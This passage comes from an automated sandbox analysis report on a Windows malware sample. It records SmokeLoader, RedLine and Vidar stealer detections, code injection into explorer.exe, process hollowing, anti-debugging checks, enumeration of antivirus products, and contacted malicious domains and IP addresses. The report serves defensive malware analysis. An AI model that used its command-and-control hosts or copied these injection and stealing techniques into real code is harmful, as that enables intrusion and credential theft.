Source: explorer.exe, 0000000D.00000000.318239161.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: svchost.exe, 00000005.00000002.541864319.000002D975A02000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000014.00000002.404556309.00000246D0829000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.405174140.00000246D08ED000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000000.308935069.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: svchost.exe, 00000005.00000002.542078705.000002D975A28000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.543853332.000001D194A67000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.543180945.000002239B42A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_00405E40
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	23_2_004096E0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,GlobalAlloc,FindClose,	23_2_00401280
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	23_2_00401090
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	23_2_00409B40
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_00409970
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_004087E0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D214D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	23_2_02D214D0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D212E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	23_2_02D212E0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D26090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_02D26090
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D28A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_02D28A30
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D29BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_02D29BC0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D29D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	23_2_02D29D90
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D29930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	23_2_02D29930

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

23_2_0040C2E0

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 0_2_02CA0083 push dword ptr fs:[00000030h]	0_2_02CA0083
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_0058092B mov eax, dword ptr fs:[00000030h]	22_2_0058092B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00580D90 mov eax, dword ptr fs:[00000030h]	22_2_00580D90
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00401000 mov eax, dword ptr fs:[00000030h]	23_2_00401000
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_0040C180 mov eax, dword ptr fs:[00000030h]	23_2_0040C180
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D2092B mov eax, dword ptr fs:[00000030h]	23_2_02D2092B
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D21250 mov eax, dword ptr fs:[00000030h]	23_2_02D21250
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D2C3D0 mov eax, dword ptr fs:[00000030h]	23_2_02D2C3D0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D20D90 mov eax, dword ptr fs:[00000030h]	23_2_02D20D90
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Code function: 26_2_02BE0083 push dword ptr fs:[00000030h]	26_2_02BE0083
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Code function: 26_2_047C092B mov eax, dword ptr fs:[00000030h]	26_2_047C092B
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Code function: 26_2_047C0D90 mov eax, dword ptr fs:[00000030h]	26_2_047C0D90

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_004048D0 VirtualProtect ?,00000004,00000100,00000000

23_2_004048D0

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_0040AC50 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

23_2_0040AC50

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: bitly.com
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Domain query: srtuiyhuali.at
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: fufuiloirtu.com
Source: C:\Windows\explorer.exe	Domain query: amogohuigotuli.at
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: bit.ly
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com
Source: C:\Windows\explorer.exe	Domain query: unic11m.top

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: 8FB8.exe.13.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\1F0B.exe

Memory written: unknown base: 400000 value starts with: 4D5A

Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Thread created: C:\Windows\explorer.exe EIP: 2E01930	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Thread created: unknown EIP: 5AA1930	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Thread created: unknown EIP: 5C11A40	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\1F0B.exe

Section unmapped: unknown base address: 400000

Jump to behavior

.NET source code references suspicious native API functions

Show sources

Source: 1F0B.exe.13.dr, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 1F0B.exe.13.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 31.0.1F0B.exe.de0000.2.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 31.0.1F0B.exe.de0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 31.0.1F0B.exe.de0000.0.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 31.0.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 31.2.1F0B.exe.de0000.0.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 31.2.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 31.0.1F0B.exe.de0000.1.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 31.0.1F0B.exe.de0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 31.0.1F0B.exe.de0000.3.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 31.0.1F0B.exe.de0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 43.0.1F0B.exe.1e0000.3.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 43.0.1F0B.exe.1e0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 43.0.1F0B.exe.1e0000.0.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 43.0.1F0B.exe.1e0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 43.0.1F0B.exe.1e0000.2.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 43.0.1F0B.exe.1e0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 43.0.1F0B.exe.1e0000.1.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 43.0.1F0B.exe.1e0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 43.2.1F0B.exe.1e0000.0.unpack, lennahCecivreSIledoMecivreSmetsyS10877.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 43.2.1F0B.exe.1e0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Process created: C:\Users\user\Desktop\cz2ZyeL2Zd.exe "C:\Users\user\Desktop\cz2ZyeL2Zd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Process created: C:\Users\user\AppData\Roaming\icgujuh C:\Users\user\AppData\Roaming\icgujuh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process created: C:\Users\user\AppData\Local\Temp\1F0B.exe C:\Users\user\AppData\Local\Temp\1F0B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process created: unknown unknown	Jump to behavior

Source: svchost.exe, 00000009.00000002.542757750.000002BA2CB90000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.300934098.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.290723386.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.315217125.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000000.300543499.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.314457860.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.290543586.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: svchost.exe, 00000009.00000002.542757750.000002BA2CB90000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.291845597.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.300934098.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.290723386.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.315217125.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000009.00000002.542757750.000002BA2CB90000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.300934098.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.290723386.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.315217125.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000009.00000002.542757750.000002BA2CB90000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.300934098.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.290723386.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.315217125.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000D.00000000.321592440.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.295968840.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.308995090.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	22_2_00437060
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,	22_2_004379A0
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,	22_2_00424230
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,	22_2_0043FCC0
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,	22_2_00437CF0
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,	22_2_0043FD30
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit,	22_2_00432530
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,	23_2_0040AE00
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,	23_2_02D2B050

Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1F0B.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe

Code function: 0_2_00406C80 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406C80

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

23_2_0040AD40

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

23_2_0040ACA0

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_00406C10 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary,

23_2_00406C10

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000B.00000002.541972904.000001E9E2102000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.541655250.000001E9E2029000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.541734509.000001E9E203E000.00000004.00000001.sdmp	Binary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 31.2.1F0B.exe.443bbb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.1F0B.exe.42ffa30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.1F0B.exe.443bbb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.1F0B.exe.42ffa30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.473714109.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.473902157.0000000004351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 3.2.cz2ZyeL2Zd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.cz2ZyeL2Zd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.icgujuh.2c315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.cz2ZyeL2Zd.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.icgujuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.icgujuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.328560589.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.398652642.00000000023A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.377828277.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.328581526.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.377862377.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.398263748.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.316265354.0000000002E01000.00000020.00020000.sdmp, type: MEMORY

Yara detected Vidar stealer
